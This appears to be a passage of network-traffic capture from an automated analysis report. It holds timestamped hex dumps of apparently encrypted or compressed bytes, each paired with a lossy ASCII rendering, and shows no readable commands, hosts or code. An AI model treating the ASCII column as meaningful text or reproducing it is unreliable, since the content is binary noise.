                                                          2021-12-14 13:10:57 UTC72INData Raw: 33 e3 22 86 c7 80 87 d6 21 8f 66 c9 d5 e0 4a cd 0e 39 3c 04 5a 7f 62 71 d9 16 1a a4 27 31 58 81 a1 4a 8c cb e6 4d fb e4 d2 b6 d1 48 4b ec f7 33 6a 25 f1 0b 69 7d c9 e5 9d 78 c8 d6 1a c5 70 56 d8 d3 51 10 e3 c9 15 23 f2 6f 7a 8b 09 c6 1a 53 46 88 5c 09 de 1d 92 e1 a2 ba 66 1e 4e 93 5b 02 4b e1 5a eb a7 8e 8f 43 a1 7e 90 f2 9a e8 59 56 a2 1d 7b f0 b1 f6 24 c3 48 ce 54 85 f2 f7 c1 48 1e 84 80 8e 9c 3c 8d 03 63 97 af 00 3d b2 eb 4c 26 9b 9e 0a 28 ed 19 a7 b5 d1 4a bf cd 9e 27 1c e4 3c c5 f3 90 0c 43 80 d8 37 e0 95 b6 17 c0 ed 0d b9 47 98 f3 9b fe 3a a8 e3 aa 7e 4c 80 1b c6 71 52 3e b7 95 6c fc a0 da 80 e5 46 37 73 3e f8 e6 91 00 fd 7b 09 48 aa e0 3a 26 c0 31 32 be 61 f7 55 16 b3 9e 69 07 0d 38 a9 44 f6 5e c9 8a fd 06 29 42 ff 39 c7 bc 3d a5 b4 e8 8a a6 65 46
                                                          Data Ascii: 3"!fJ9<Zbq'1XJMHK3j%i}xpVQ#ozSF\fN[KZC~YV{$HTH<c=L&(J'<C7G:~LqR>lF7s>{H:&12aUi8D^)B9=eF
                                                          2021-12-14 13:10:57 UTC74INData Raw: df 7b 84 9b be f8 9d a3 94 94 24 8d 8d 10 00 ed f8 ba 21 e6 99 3a 13 92 94 49 41 88 ed 9b f9 86 5d cb cd e3 9d 4c 3b c6 76 f5 d1 a6 f7 e1 3d ba 19 6c e3 bb b8 24 ed af 52 d0 8e 19 4f 48 5b b9 6a 39 27 f5 86 1e fd c4 0c 74 c5 a1 c4 0d 84 b0 c8 3d 24 2c ab a7 fb 66 0b 16 0a 84 ab 5b 9b 46 dc 95 f2 fa 39 5c 00 9a 1b b0 0d b0 cb 4e b6 bd 9f ba b9 b7 48 5e 9a 61 1b f4 b4 0e 67 3e 6c b5 d3 f8 9a ee 31 ce 4d 8a 10 3f 8b db 46 0a dd b9 80 a8 8f eb 52 0c c4 49 43 24 51 51 81 a6 c5 f0 cc c6 5b a9 eb 19 df fb 82 24 73 80 d7 17 88 ae ab f4 50 10 34 eb 5f 1c 7a b9 40 7e fb 2e b0 d9 02 ab cf dc 5f 0f 6e 22 3f 5c 7b 88 94 39 41 e4 2e e3 fc 09 a9 e5 d4 17 98 36 37 99 4f 13 ca 86 09 f3 6e 40 56 8e f0 fc b8 de 9c 41 79 4a 66 7a 95 53 34 bc 10 82 53 b2 61 8b d1 ae a9 e7 2e
                                                          Data Ascii: {$!:IA]L;v=l$ROH[j9't=$,f[F9\NH^ag>l1M?FRIC$QQ[$sP4_z@~._n"?\{9A.67On@VAyJfzS4Sa.
                                                          2021-12-14 13:10:57 UTC75INData Raw: a5 c2 38 82 e4 81 e1 ab 0a 68 ae c6 ba 76 af 02 f4 fa 13 fe 69 df 6a fd ca 98 b8 f6 7c 14 a6 c4 a0 6a dd 1b e7 26 08 7a ba 6d ca 26 8e 6f d5 58 ee 64 c9 10 7c 37 0b 5a 7c 0a 35 d8 3a 35 a8 2e 03 64 3b a1 40 91 39 64 9f 76 c9 fa 08 d0 43 43 e0 fe 2e cc 29 9e 50 63 55 55 e6 13 c9 ce 49 0e ef 66 57 d0 f2 69 ee e2 ef 2e 9c fe 6f 73 9a df f6 36 51 5b a8 5b 06 cf 3e 09 cc a0 91 63 46 40 95 71 04 58 fe 7b e6 8f 2c 8a 43 a7 b1 17 f3 8b 9d ce 51 a4 1a ad 92 ac de 9f d5 59 c0 31 0b db 57 c3 5f c2 bf 31 9d 99 0e b2 14 61 97 b4 09 25 d8 ea 21 af 90 b3 00 13 4a 35 e0 b2 f9 58 ac c9 85 25 21 82 9d 66 f7 96 65 b4 99 da 3d f9 81 b2 29 ce e5 35 23 57 9e db ad f2 2b a9 51 96 7a 5d 8e 4d 20 73 52 34 b5 9c 52 e8 ad e2 d8 f7 4e 26 6a 09 05 eb 0b 13 ea 62 1b 0f b1 e5 3a 2a fe
                                                          Data Ascii: 8hvij|j&zm&oXd|7Z|5:5.d;@9dvCC.)PcUUIfWi.os6Q[[>cF@qX{,CQY1W_1a%!J5X%!fe=)5#W+Qz]M sR4RN&jb:*
                                                          2021-12-14 13:10:57 UTC76INData Raw: e3 3d 6f f2 b1 c6 38 d0 e8 6a 00 fe b8 0d d0 d4 d4 0b 4f 0d cf 57 32 c6 62 e5 0c 17 0e d9 02 bc 97 65 9d c2 7b 27 9b af d0 96 b2 9a 80 06 33 eb 11 00 7b fd a3 16 7d 87 65 85 ec 8d 57 4b a2 15 45 eb ae f6 da c3 f6 be 7d 0e 5a 61 f1 e6 92 d7 74 37 64 19 f6 d8 b5 a7 28 dd 7e 52 d0 8e 85 5e 5c 5e b7 58 ec 27 f5 87 99 dc ce 13 58 da 97 58 3c 8a af c9 0a c2 b0 ba a3 e6 63 3d e0 98 85 ab cd e5 5f c2 87 e7 8e 7b 41 26 b2 08 af 5c 04 e2 40 a9 a3 5e d8 23 8c 46 40 9f 7e 23 68 a5 00 78 3d 59 60 df e2 9a 72 21 de 50 b5 2c c6 8b d1 6c 85 fc b4 9f 12 ad 30 52 af c4 d5 43 3c 43 70 0a c0 59 e1 c2 d0 5e 91 b3 18 f3 f3 26 b9 7f 9f cc 17 da 3f ba f3 50 02 ea 39 73 12 aa 05 51 70 e6 1b bb 83 9e b0 cd dc 4e 19 f2 3a 2e 52 9a 96 eb ab 80 c8 23 fc ee ac 96 e5 d4 1c 87 27 34 9a
                                                          Data Ascii: =o8jOW2be{'3{}eWKE}Zat7d(~R^\^X'XX<c=_{A&\@^#F@~#hx=Y`r!P,l0RC<CpY^&?P9sQpN:.R#'4
                                                          2021-12-14 13:10:57 UTC77INData Raw: ee 47 7f 35 ff e9 28 15 e9 e0 c0 b6 6b b9 ac c1 0e 52 7a 54 25 76 cb 5c 3a ba bd 25 47 30 dc 5b 8c 9d b6 b4 d4 33 a9 f6 99 18 bd d8 60 98 49 89 7d af 04 e8 1d 1f d2 62 d1 9f fc e1 92 44 f1 46 10 03 71 e4 d2 df 60 85 20 86 c9 be 5b d2 28 f3 0e cf a6 eb 62 cd 04 56 3f 36 58 75 39 cb d9 16 16 ae 38 3a 66 31 8a 51 86 e4 64 b7 fa ce f8 10 da 48 46 f1 16 28 6e 9c e6 00 63 52 47 1f 9c 52 e2 43 18 ee 99 58 ab 92 7e 10 e7 e9 0e 86 f0 12 13 8c 21 f3 30 53 4c a5 48 3f d1 c0 20 e0 a2 ba 67 6d c3 83 4d 0f 73 fe 4b e8 98 23 8a 6f a5 09 1c f3 9d f8 8a 50 88 12 b1 86 b0 f1 3c 2b 58 e6 39 26 f1 dc 24 5d bf fd 8f 9d 9d 2e e3 00 60 ea d4 04 2c b3 d7 23 af 9a 8d 3c 39 eb 19 e0 b4 d1 46 ae c9 9e 34 00 a0 ae c4 f4 81 9d da ac da 25 f8 92 b9 29 23 ef 21 bd 41 95 db bb e6 c4 a3
                                                          Data Ascii: G5(kRzT%v\:%G0[3`I}bDFq` [(bV?6Xu98:f1QdHF(ncRGRCX~!0SLH? gmMsK#oP<+X9&$].`,#<9F4%)#!A
                                                          2021-12-14 13:10:57 UTC79INData Raw: 7e 0e 53 61 f3 ad 46 bf 68 78 f5 55 4c 37 ec 54 65 aa d4 aa d2 f3 40 eb bb f6 65 9a 6f 93 38 81 be a7 6a ca 2b 64 d3 74 c4 39 ed 11 41 2c fc a1 16 d0 d3 c2 f5 7e 21 2c 51 38 d3 7f fd f2 17 39 eb 2d be 92 86 9f b9 21 27 9b ba d2 37 b0 99 a2 15 1b 8d 1a 7d 0b e9 b4 3a c5 86 65 9c b3 99 56 38 a8 1f 9b f9 86 c1 da c1 d4 81 53 0c 50 64 d6 c5 82 ea 71 3d bc 6a d6 f0 b5 ad 53 cf 0d 03 d1 8e 83 31 05 45 b7 4c f4 24 dd c7 87 ec cc 7c 53 d8 97 52 73 b1 ae d8 24 57 df f8 a8 e4 71 28 e0 34 81 ab c1 e5 60 c1 87 e7 eb f6 4c 0e 83 0a c0 14 2d da 46 aa 81 bf dd 25 a0 29 69 8d 7e 29 07 f0 01 78 2e 4e 0f 91 f9 9a 74 23 e8 12 98 30 c2 e4 f3 44 96 c6 d8 c8 b1 af 36 78 12 d7 e5 50 2a 66 48 9e c2 51 e1 c2 c8 57 82 66 02 df fc 09 cb 7c b3 ce 10 c8 32 bd ec b1 0d 38 3a 48 17 7a
                                                          Data Ascii: ~SaFhxUL7Te@eo8j+dt9A,~!,Q89-!'7}:eV8SPdq=jS1EL$|SRs$Wq(4`L-F%)i~)x.Nt#0D6xP*fHQWf|28:Hz
                                                          2021-12-14 13:10:57 UTC80INData Raw: 44 e4 80 28 a8 34 8a d8 d1 ca bc e9 e6 96 02 f2 f1 7e e7 3c 43 70 3d 66 f2 44 33 40 1d 00 55 18 99 9d 2a e8 58 7c f6 a8 75 2e 0a e2 ef fe 2a 6f a6 bb de a2 0c 7c 41 29 69 a9 c0 2f 95 b2 38 f3 36 c3 55 a4 40 b6 a5 c2 a4 84 f2 96 00 8c ba 67 ab 5b b1 90 af 03 fe 7f 18 e1 71 d9 f3 60 e0 95 a8 d0 eb 12 28 73 53 37 c2 08 f4 bc 80 d2 80 59 37 2b 8e 66 53 a0 f0 5d ed b6 56 2c 06 c6 73 0e dd c6 05 8c a8 27 3c 50 9f a1 4a 86 7f 75 56 e3 c2 4a 08 d1 48 dd e1 f7 30 5d e7 6d 0d 7c 4f 7f 0f 9d 7e e0 f4 1c da 61 45 9f 67 78 0f ff dc 23 18 f5 70 67 93 60 6b 1c 4c 52 ba 4e 93 d5 df 17 c0 4f ba 61 6d 5f 94 44 24 47 9e d7 e9 90 fc 94 57 3b 17 08 d1 ba 62 74 51 a4 8c a0 92 93 d6 c1 d5 59 ca a7 0b ec d3 d8 14 58 91 90 b8 86 42 5d 04 7c b1 a1 09 b0 b1 e2 04 8f 5b 9e 0c 3b 77
                                                          Data Ascii: D(4~<Cp=fD3@U*X|u.*o|A)i/86U@g[q`(sS7Y7+fS]V,s'<PJuVJH0]m|O~aEgx#pg`kLRNOam_D$GW;btQYXB]|[;w
                                                          2021-12-14 13:10:57 UTC81INData Raw: cc 06 61 15 2b f1 fa 50 6a 5b cf 85 bf 43 ca 9c 57 9f 0c e7 16 f7 23 16 85 af a2 78 f7 43 4f 9e 27 58 76 7c 23 4a 62 7f ae 3d c0 07 50 f3 7f 68 2a e2 3a 17 aa c5 a5 e7 fe be ea 84 ef 76 9d 41 82 30 1b 07 10 6e db 3b 47 40 6b c4 38 ec c7 2f 01 fe bf 35 b6 d5 d4 01 57 60 2f 46 35 bc 5e e7 0c 10 0a e7 15 b7 b9 74 96 df a5 26 b7 b8 fe 12 bb 84 99 0f 1b 9c 1b 18 8f e8 98 34 ed ae f0 8f 83 90 5a 52 bb 14 9b e8 8d dd 24 c2 d0 87 42 09 72 d3 ff ce ac ff 00 3d ba 13 e3 f4 a8 b4 22 cd 6f 59 cb 70 84 72 54 4c 9f f9 f2 27 f3 ae f6 ec ca 19 6c 40 84 5d 00 99 a4 d8 33 5e af b4 57 e5 5b 3b d9 0d ac 12 c3 8a 4e ac ad ef 84 a3 52 01 96 03 af 47 27 cc be a8 85 83 cf 36 ad 46 50 84 61 31 96 a4 2c 7a 03 49 58 f4 06 65 8d 29 ea 52 8e 00 c1 8b 92 46 96 cc 1c 9f b0 be 26 5e 27
                                                          Data Ascii: a+Pj[CW#xCO'Xv|#Jb=Ph*:vA0n;G@k8/5W`/F5^t&4ZR$Br="oYprTL'l@]3^W[;NRG'6FPa1,zIXe)RF&^'
                                                          2021-12-14 13:10:57 UTC82INData Raw: 91 dd ee 1c a9 45 9a e3 cf fe 3a a2 cb 94 7a 5b 74 23 16 72 4a 2d a2 92 55 ff b9 24 aa da 5e 24 6c 68 20 e4 91 0a c4 46 1f 60 37 ef 20 33 d2 bc 24 ba 79 08 40 2e b7 b4 dc 68 39 30 bd 66 07 68 cb 8c e1 81 37 51 fb 38 c2 ac 33 73 16 c4 91 8c b2 da 04 b7 14 94 c8 b6 83 61 27 d8 53 73 ad dc c4 a5 ad 16 53 96 a1 c9 78 02 89 25 2d c1 b3 b2 b4 38 2e 0b bf 32 2d 3b 16 a4 0d 33 47 c3 bf 9e 2e b9 18 75 08 ee 32 2d b6 a4 02 b6 b5 b3 60 19 fa 9e 9f 76 12 32 ed c1 76 75 51 d6 98 91 72 c2 fd c8 61 0d c1 1f ce 0a 10 94 ad 2e 63 40 6c 40 9c 71 7d 72 7c 2f 47 62 3e af 3d cc 7e 4b fa 57 40 37 ef 2f 16 77 7b ac f8 f3 43 f8 af b5 db 9a 47 99 33 90 28 b4 7b cd 2e 7f e9 7e ab f7 fa ef 4a 13 ec 92 03 c1 c5 c5 1b 10 ec 2f 46 39 c0 73 e2 1e 1d 3d df 04 bc b3 0a 51 c2 5b 2d 8a ae
                                                          Data Ascii: E:z[t#rJ-U$^$lh F`7 3$y@.h90fh7Q83sa'SsSx%-8.2-;3G.u2-`v2vuQra.c@l@q}r|/Gb>=~KW@7/w{CG3({.~J/F9s=Q[-
                                                          2021-12-14 13:10:57 UTC83INData Raw: 1b f3 30 ba d2 4f 0c 14 89 5f 1c 6b 33 5a 5b ff 33 a8 94 60 bb ed c1 59 1f f2 34 27 bd 65 bb c5 b2 5b ea 24 e4 12 85 ae e7 ff 14 a0 db 24 ec f5 33 52 82 23 d1 f0 52 25 35 ef f3 20 e5 92 59 66 31 ca 68 9b c5 14 72 10 30 53 2e 61 93 c6 89 a4 7b 3f c2 34 33 70 3a b0 32 fd 92 6e c0 41 07 4b 4e ad c2 3a 48 6d 1f d5 49 de fe 22 4d f7 f9 37 77 74 96 e3 83 92 5b 96 f5 46 d3 6f 29 54 16 9b 18 c1 d6 e2 de d9 78 38 ca 6e 7b 36 ef 13 7f 3b 72 60 b8 13 b5 7a 9f fe ae 91 74 fc 0a a1 c0 82 94 34 ee e7 87 cd 92 e6 7f ee 1e 45 af 82 c6 26 7c 75 31 d4 44 ca 98 b3 84 32 a7 0b d8 dc 42 74 cc 8f 35 47 f1 77 fb 5e 44 40 20 05 6c 69 aa 58 34 4a 58 01 8e e4 05 ed 59 a3 c3 d5 fa 18 13 e8 43 c1 b6 69 0a b0 c1 b9 86 69 57 1d 93 cb 5c 29 8a ae 2c 77 ce dd 77 8e 99 a1 73 3c 33 80 ed
                                                          Data Ascii: 0O_k3Z[3`Y4'e[$$3R#R%5 Yf1hr0S.a{?43p:2nAKN:HmI"M7wt[Fo)Tx8n{6;r`zt4E&|u1D2Bt5Gw^D@ liX4JXYCiiW\),wws<3
                                                          2021-12-14 13:10:57 UTC85INData Raw: be 0e 51 65 fd 23 ab 85 b4 1f 34 eb 20 ef ab fd be af e5 cc 20 70 42 b5 c4 f7 9e 72 df 56 57 16 f3 92 bc 17 98 ec 0d b5 54 e5 1d bc fe 3e a4 b8 bb 7c 4c 80 33 3f 02 6d 3c a6 98 6c bb a2 da a1 de 0f 24 7b 0d 1d f0 07 b7 83 60 1c 60 37 99 e8 20 d6 b8 2a 93 72 f9 41 13 a8 a9 dd f9 0c 1e b6 77 a2 cc c9 8c ea 86 31 5a ec 37 d3 b9 26 92 54 16 8b 80 5d cc 15 bc 3a cf a8 b1 5f 52 8a cb 5f 6c 88 ef 34 a5 bc 19 13 b3 52 d3 47 0f b1 1c 21 d7 4d ac dd 28 36 18 aa 3d 23 7f f3 5b 20 16 7d e2 b7 b5 a5 af 73 66 1c de 20 22 42 aa fc b7 36 82 62 0b 8b de 0e 76 18 26 91 9a 67 77 51 d6 a6 ff 50 c1 89 4a 65 15 13 7a a0 26 10 9e 8f 78 52 42 4d 67 d9 0d ee 78 64 4a d5 4b 10 a9 37 d9 65 6b fe 7f 7f 3a f0 11 e2 ab f8 a7 c0 36 be 14 57 d9 5e 89 48 93 29 8e 36 59 6b f7 0b 6d fb 1c
                                                          Data Ascii: Qe#4 pBrVWT>|L3?m<l${``7 *rAw1Z7&T]:_R_l4RG!M(6=#[ }sf "B6bv&gwQPJez&xRBMgxdJK7ek:6W^H)6Ykm
                                                          2021-12-14 13:10:57 UTC86INData Raw: a0 db 46 94 e4 f2 9d b0 a5 32 29 ca c4 d5 56 2c 3d 76 9c c2 53 f0 c7 aa 7e 8b 4d 13 f7 bb 1c 35 77 96 da 9e b0 0d b8 fa 45 24 54 3a 5f 16 52 64 53 70 ee 3a b8 15 29 d5 d2 c2 41 1e 8f e0 31 43 60 88 f2 b6 5f ea 32 f3 f3 b6 7c e4 f8 1f b3 5e d8 68 a6 2c 61 95 06 f3 e3 5e 47 ae 11 f2 08 b8 90 22 af 22 fa 6f 93 5b 10 a4 9f a9 53 2e 72 ad 8c b0 de 71 3d b9 f2 3a 67 c0 b7 6d c1 88 63 ca 59 1a c6 70 83 cf 33 62 56 db d5 43 d3 66 03 0f dc e2 3a 7d 55 cf 1f 82 b4 56 97 49 2f e1 6d 20 44 c0 da 36 d8 df e8 d8 99 07 0c e3 27 76 1c d4 d7 7f 31 7f f7 99 77 50 49 94 e2 ac ca 7b fc 09 92 7f 81 b8 27 e5 86 d7 7a fd f1 79 7f 34 b8 79 82 c6 7d 43 cd 22 db 44 f5 8f ab bd d0 ab 27 fc cc 30 33 e0 8d 23 5b f7 78 6b e6 45 6c 23 06 c3 42 2e 55 0b af 52 06 8c c2 3a d1 47 75 e8 fd
                                                          Data Ascii: F2)V,=vS~M5wE$T:_RdSp:)A1C`_2|^h,a^G""o[S.rq=:gmcYp3bVCf:}UVI/m D6'v1wPI{'zy4y}C"D'03#[xkEl#B.UR:Gu
                                                          2021-12-14 13:10:57 UTC87INData Raw: 38 60 11 17 f7 e9 a8 76 51 ae 38 ec 8f b0 fc 0c 9e 5b ca 31 62 76 f6 c7 59 db df 9c 92 99 15 ce 1d 7e 69 bf 28 3f b5 f4 32 a6 0c f1 8f 3a eb 37 d9 5f 26 bf 51 d6 91 31 04 8b a4 cb ec aa 9d da ac f9 3f 88 5a be 3f d9 9d 33 bd 56 94 c2 d6 8d 05 a0 cb 8f 56 08 88 22 30 67 12 18 53 6d bb e4 9d c9 a4 f6 5f 29 6d f9 15 ca 92 17 ff 7c 1d 71 32 fb 77 de d7 90 37 95 64 ce df f1 58 49 e0 07 16 02 ba 6c 5e 5a c9 8c 5d 8b 2e 53 fd 43 15 a8 29 89 14 6c 1b b3 40 9a 40 b1 12 8e a8 b2 26 7f 86 d8 59 6a a6 8f 04 a7 ad 1c 24 b7 ae d2 61 2e c8 36 29 dd 55 dc 1c 3a 39 1e c8 0c 3e 3f 07 24 4e 1d 45 e2 95 f6 a7 b0 38 f9 f3 de 31 2c 51 b0 0f b4 61 78 60 08 fc cc 49 74 69 f3 fb e9 5c fb e6 d1 8c bd 29 0a 83 5b 65 79 4a 09 e6 25 12 ef 6c 38 50 46 c9 f8 14 30 ee 72 7d 2d 79 79 11
                                                          Data Ascii: 8`vQ8[1bvY~i(?2:7_&Q1?Z?3VV"0gSm_)m|q2w7dXIl^Z].SC)l@@&Yj$a.6)U:9>?$NE81,Qax`Iti\)[eyJ%l8PF0r}-yy
                                                          2021-12-14 13:10:57 UTC88INData Raw: ad 4c ad 56 26 cc 73 f7 ab fb 13 25 a6 42 48 9e 78 f5 e7 8f 00 78 2a 37 b0 d3 f8 9e 63 2d e8 40 9c 30 ce 89 a0 80 96 cc b3 98 c3 91 32 52 06 d5 dd 21 15 4c 48 94 ea 19 e3 c2 d3 50 8d 3e 5f dd fb 14 1d 3d 9d cc 02 eb 73 b8 fa 45 1d 11 29 52 93 53 25 51 72 9f fe af 83 9a 0d ae d0 40 14 f8 91 09 69 65 97 c7 a7 2b 22 23 fc e8 f7 bc e7 d4 1c 92 52 55 a8 5b 33 58 ae 4d f1 f2 5b 4e d9 e2 f2 24 cf 90 22 ad 22 fa 6f 92 5b 12 a4 9f a8 53 2e 72 fe 1b b1 de 7f 2e cf 1c 7f 65 c4 bb 1c 84 4c 63 c0 4c 18 c6 71 83 cf 33 5b 1e aa ea 4b da 7a bd 3c e1 e0 30 66 79 fc 5b 80 be 55 a8 9f 5e de 65 08 0f ea 9a 3e c9 d0 f0 cd 80 5d 33 e1 25 07 f9 94 d5 7b 8c 19 fd 0e 04 65 e9 ac 47 84 8a 79 fe 78 71 3e 83 bc 24 fd 9a 97 42 b8 e2 78 7d 45 15 af 82 c2 68 51 dd 76 d5 44 ee 82 cf 68
                                                          Data Ascii: LV&s%BHxx*7c-@02R!LHP>_=sE)RS%Qr@ie+"#RU[3XM[N$""o[S.r.eLcLq3[Kz<0fy[U^e>]3%{eGyxq>$Bx}EhQvDh
                                                          2021-12-14 13:10:57 UTC90INData Raw: e3 c9 3f 81 e2 6a 6c 00 1e f7 1a 52 5a 8d ea 0f d3 ca 24 82 a4 ab 65 6b d2 96 c1 10 70 58 48 ef 89 c5 06 44 a7 11 16 e0 90 ff 7e 47 b2 9c 99 8d b0 f7 86 c4 53 dd 2a 08 db e6 c7 5f ce 35 9e 97 8a 0d d0 0b 77 83 a6 89 03 b7 fd 22 bc 91 8f 07 2d fd ad f1 bf c6 57 32 d8 84 0a a8 8b b5 ce e2 9d 74 4b ac d3 2c fa 85 24 17 cc ee 0d b5 45 9b f3 ad fe 3a a8 69 83 6f 48 10 36 12 bd 56 3e a0 85 c9 fc a0 da aa e5 44 37 71 11 3c 2b 95 00 ea d1 0c 6a 29 f0 2e 08 75 bc 35 b4 77 7a 7e 02 a7 b7 dc 2f fc 33 bd 66 03 5f e2 c9 e9 89 55 8e ff 38 d7 dc a8 8d 17 e9 9b a8 5a 0c 89 a2 12 8e ab 99 1d 43 84 d2 27 52 cc fc 20 d8 61 16 0c f3 ae a9 a7 06 89 30 38 d3 4b a2 9c a1 11 84 bb 32 36 9d 1c 5e 1b c9 56 ec ac b1 b4 b8 0c 38 ed 21 ce 2f 5f dd cb b6 1a b7 67 87 d3 e0 0c 74 69 ed
                                                          Data Ascii: ?jlRZ$ekpXHD~GS*_5w"-W2tK,$E:ioH6V>D7q<+j).u5wz~/3f_U8ZC'R a08K26^V8!/_gti
                                                          2021-12-14 13:10:57 UTC91INData Raw: f5 38 ec ca 19 71 f2 58 5c 1c 8c a3 ca 23 75 b1 ba a9 64 5f b4 c9 0a 8e d5 fb 8a 48 c9 8f 82 34 a4 4d 04 96 0c be 52 43 6b 41 a9 a3 0e 6f 33 9d 29 40 8f 7e 32 6c ca b1 79 28 46 73 c1 ee 89 63 18 93 53 9d 30 d5 99 ca 57 0c df bb 8e b4 be 3c 3d bc c5 d5 58 39 44 5c 8d c9 5e e9 d3 d5 69 ad 4d 19 d5 ed 3e 2c 7d 9d cc 1a c8 1a 2e fb 4f 0a 07 31 7f 1d 7b 25 51 fd cf 33 af 82 8d b7 e1 c2 40 14 f2 be 1a 43 64 96 d4 a2 41 e1 0b 43 ee 84 84 f3 c2 05 98 2a 35 86 54 13 52 87 09 f3 e1 45 4a 8d c7 65 25 cf 94 4a 6f 33 f1 43 4b 4e 14 74 06 94 40 3a 62 91 da b6 fe 7b 3e c2 34 29 74 d6 a2 36 69 8b 63 c6 5b 16 c6 6d 83 cf 3f 59 1e c8 dd 58 d6 1f bd 7e e3 e6 2c 64 78 99 0c 8f 30 e8 97 05 4f cb 7c 2e 65 fc 8b 39 c9 db 70 d6 21 66 22 e4 30 aa 27 91 c4 71 2c a0 fd 01 15 61 5a
                                                          Data Ascii: 8qX\#ud_H4MRCkAo3)@~2ly(FscS0W<=X9D\^iM>,}.O1{%Q3@CdAC*5TREJe%Jo3CKNt@:b{>4)t6ic[m?YX~,dx0O|.e9p!f"0'q,aZ
                                                          2021-12-14 13:10:57 UTC92INData Raw: 7b 86 e3 77 4c f2 f3 fe 00 d9 c6 f6 f1 c0 42 42 9e f7 18 65 44 59 f7 63 7d ea 6e 36 d2 52 88 d4 fb 78 01 e5 4f 57 84 f3 6e 52 97 20 f7 10 20 1a a7 5b 05 a9 c9 22 e0 a2 a9 51 6b c3 e3 5b 04 58 5a 4b ef 9e cb 86 40 a3 05 01 e1 99 f8 5c 38 a4 10 a0 9e b4 e7 20 c3 a7 c9 31 0b df e0 ef 8d c0 97 89 8c 9d 88 ba 02 63 96 96 1f 2d b7 f7 50 f9 98 9e 06 41 e2 26 3a a3 07 cd 85 c9 8f 23 18 8e b6 c0 e2 93 72 de 0e 6f 2f f0 84 96 56 dd ee 0b ac 52 8f df aa 00 39 a9 cc a9 69 64 58 26 3a 77 43 3a 2a e9 44 fb a1 f2 b0 f7 4e 2c 08 51 16 e6 9b 7a fd 76 37 60 3d e4 29 10 d3 bc 8b bf 61 f6 81 02 a7 a7 dc 14 07 0a 12 6d 2f 5d c9 9d e1 92 d0 43 d3 3e d0 bb 2e 97 04 e2 8a bd 47 c4 fa b6 3e 87 92 c9 55 41 84 c7 5a 60 c6 fc 2a af b2 19 f2 f6 80 d5 7d 15 81 2b 39 c4 47 b3 89 31 26
                                                          Data Ascii: {wLBBeDYc}n6RxOWnR ["Qk[XZK@\8 1c-PA&:#ro/VR9idX&:wC:*DN,Qzv7`=)am/]C>.G>UAZ`*}+9G1&
                                                          2021-12-14 13:10:57 UTC93INData Raw: da c3 f6 94 3c bd 5b 67 fd e6 92 d7 74 37 64 19 f6 de b2 a5 2f a2 d5 53 d0 88 af 5e 47 58 b7 4a f6 27 fe 86 8d f6 ca 1f 61 da 97 59 1c 8a 89 d8 3e 17 b0 a8 b3 e4 77 2a d3 3a 8d ab 45 88 48 c3 41 ed 84 b4 59 1d 83 1f bc 51 38 d1 56 ba ad 94 d4 33 ac 52 52 8a 6a 2e 6b b7 01 6a 2c 5e 62 c1 f8 88 77 32 c3 7a 31 31 c4 8d e2 41 94 cc b7 b7 00 ae 30 54 1f c2 c4 54 28 35 91 9e c2 5d e3 b9 05 41 89 49 0f 45 80 c1 35 7d 9b a3 96 c2 32 bc f8 34 d0 14 38 5b 0a e0 5e b1 70 e4 37 c0 eb 9c ba cb 1d 09 31 da 04 31 43 6e 84 cf a6 41 e2 0b 93 ec 84 84 cd 00 12 8b 3e 0e 38 58 33 54 a0 1f e0 f5 79 60 99 ef f9 fa ec b7 71 51 22 fa 61 88 43 17 52 11 82 53 ae 58 51 cf b1 d8 53 90 c3 34 3c 41 d2 a2 19 d7 b2 63 c0 42 c1 b5 5e 86 f6 bf 4b 16 d9 c3 4b a1 ac 95 7c e7 6e 8d 60 a7 98
                                                          Data Ascii: <[gt7d/S^GXJ'aY>w*:EHAYQ8V3RRj.kj,^bw2z11A0TT(5]AIE5}248[^p711CnA>8X3Ty`qQ"aCRSXQS4<AcB^KK|n`
                                                          2021-12-14 13:10:57 UTC95INData Raw: 19 7e 1b ed 2a ae dc 94 79 da 44 e3 64 cf ac c9 59 c6 15 5c 38 2e 83 71 11 cd cf 9b 17 ae 38 2a 64 2e b5 62 25 e3 73 43 d3 f3 fa 08 db 27 2c e5 e8 23 64 8f fa 14 43 3a a6 e0 9d 74 c6 79 11 d4 7e 42 4a 94 12 12 e3 c9 0a 93 f5 00 4d 8e 21 fd 0d 89 5f bc 48 01 eb 61 08 e0 a2 bc 70 63 ac a6 59 04 52 fa 71 80 64 dc 8b 49 b4 1d 06 ff 8f d5 f6 51 a4 10 a0 9c be 99 10 d7 59 c0 2d 1c ff 98 28 5f c4 9d e0 f7 9b 04 cb 11 6e 86 b3 2c 90 b5 fd 25 b4 f5 f5 0e 3b e1 1d d6 b2 c0 4e c1 fd 8d 22 01 9a b9 d3 25 f9 6b da 80 d2 52 99 90 be 35 d1 ff 06 97 7b 9d db ba 91 56 a0 cb 8f 58 5d 81 24 2b 7f 3d 0a a4 92 4e 94 cc d8 ab fc 68 0d 5d 16 19 ce e0 00 ec 75 30 7d 2c ef 12 0d d5 bc 33 d1 0d f4 41 08 81 a7 c1 01 1c 3c d2 58 2d 5d c3 e3 87 89 2e 48 d9 29 dd bf ff 9e 19 f9 84 bd
                                                          Data Ascii: ~*yDdY\8.q8*d.b%sC',#dC:ty~BJM!_HapcYRqdIQY-(_n,%;N"%kR5{VX]$+=Nh]u0},3A<X-].H)
                                                          2021-12-14 13:10:57 UTC96INData Raw: 65 9b e8 5b 34 ab bd f8 2b b2 9a 8a cd 1b 8d 01 16 7a c2 af 3e e8 91 9b 8e af 98 4e 40 a8 18 8d 07 87 ed d8 d4 f7 96 54 14 a4 66 d7 cc 81 d5 5f de a2 0e ec 81 c7 a5 29 c7 54 20 d2 f5 5b 5e 46 40 9b 4b dc 25 e2 fb 5c ec ca 17 79 a1 4c 58 1c 8e c0 23 22 55 ba 90 a9 f7 47 29 c8 4c 84 ab c7 8a 48 c3 87 ef ac b2 4d 0e 8f 0a b9 2b cd da 40 ad aa a8 57 24 a6 4c 6d 84 56 0d 6a a5 06 0b 0e 4e 60 d9 82 9e 64 12 c8 56 bd cf 3b 8b db 77 9d e4 99 9d b0 a9 43 05 0d c4 df 28 28 4d 35 41 c2 59 e5 c0 dd 3c 69 4d 19 db d1 1e 35 6e af cf 08 86 32 ba fa 4f 0c 14 38 5d 1f 7e 0d e3 71 e4 35 aa ab 11 bb c1 c9 6d 1f da 1d 33 43 62 e4 e1 a7 50 e0 59 f2 e8 ac 0d e4 d4 1c a7 33 0e b9 5b 33 54 f5 2f f1 f2 5b 22 9b f8 8e c5 cf 92 5d 64 27 f4 6f b3 32 14 72 16 ff b1 2e 70 81 e1 b1 de
